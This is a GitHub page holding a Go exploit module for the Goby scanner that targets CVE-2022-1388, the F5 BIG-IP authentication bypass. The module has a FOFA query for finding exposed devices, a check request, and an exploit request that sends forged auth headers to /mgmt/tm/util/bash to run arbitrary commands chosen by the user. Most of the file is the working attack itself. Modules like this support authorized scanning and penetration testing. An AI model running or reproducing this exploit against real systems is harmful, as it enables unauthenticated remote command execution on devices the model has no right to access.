-
Notifications
You must be signed in to change notification settings - Fork 197
/
F5_BIG_IP_login_bypass_CVE_2022_1388.go
167 lines (164 loc) · 5.85 KB
/
F5_BIG_IP_login_bypass_CVE_2022_1388.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
package exploits
import (
"git.gobies.org/goby/goscanner/goutils"
)
func init() {
expJson := `{
"Name": "F5-BIG-IP-login-bypass-CVE-2022-1388",
"Description": "<p>BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。</p>",
"Product": "BIG-IP",
"Homepage": "https://fofa.so/",
"DisclosureDate": "2022-05-11",
"Author": "",
"FofaQuery": "body=\"F5 Networks, Inc\"",
"GobyQuery": "body=\"F5 Networks, Inc\"",
"Level": "3",
"Impact": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。</span><br></p>",
"Recommendation": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">参考漏洞影响范围,目前F5官方已给出解决方案,可升级至不受影响版本或参考官网文件进行修复 </span></p><p><a href=\"https://support.f5.com/csp/article/K23605346\">https://support.f5.com/csp/article/K23605346</a><br></p>",
"References": [
"https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
{
"name": "command",
"type": "input",
"value": "id",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/mgmt/tm/util/bash",
"follow_redirect": true,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
"X-F5-Auth-Token": "a",
"Connection": "Keep-Alive, X-F5-Auth-Token",
"Authorization": "Basic YWRtaW46",
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\"command\": \"run\", \"utilCmdArgs\": \"-c 'id'\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "uid=",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/mgmt/tm/util/bash",
"follow_redirect": true,
"header": {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
"X-F5-Auth-Token": "a",
"Connection": "Keep-Alive, X-F5-Auth-Token",
"Authorization": "Basic YWRtaW46",
"Content-Type": "application/json"
},
"data_type": "text",
"data": "{\"command\": \"run\", \"utilCmdArgs\": \"-c '{{{command}}}'\"}"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody||"
]
}
],
"Tags": [
"命令执⾏"
],
"VulType": [
"命令执⾏"
],
"CVEIDs": [
"CVE-2022-1388"
],
"CNNVD": [
""
],
"CNVD": [
""
],
"CVSSScore": "",
"Translation": {
"CN": {
"Name": "F5-BIG-IP-login-bypass-CVE-2022-1388",
"Product": "BIG-IP",
"Description": "<p>BIG-IP 是 F5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。</p>",
"Recommendation": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">参考漏洞影响范围,目前F5官方已给出解决方案,可升级至不受影响版本或参考官网文件进行修复 </span></p><p><a href=\"https://support.f5.com/csp/article/K23605346\">https://support.f5.com/csp/article/K23605346</a><br></p>",
"Impact": "<p><span style=\"color: rgb(77, 77, 77); font-size: 16px;\">未经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。</span><br></p>",
"VulType": [
"命令执⾏"
],
"Tags": [
"命令执⾏"
]
},
"EN": {
"Name": "F5-BIG-IP-login-bypass-CVE-2022-1388",
"Product": "",
"Description": "<p style=\"text-align: justify;\">Big-ip is an application delivery service from F5 that is geared towards the world of application-centric advanced technology. Keep the application running with big-IP application delivery controller. Big-ip Local Traffic Manager (LTM) and Big-IP DNS can handle application traffic and secure the infrastructure.</p><p style=\"text-align: justify;\"></p><p style=\"text-align: justify;\">An unauthenticated attacker can use the management port or its own IP address to access the big-IP system, execute any system command, create or delete files, or disable services.</p>",
"Recommendation": "",
"Impact": "",
"VulType": [],
"Tags": []
}
},
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`
ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}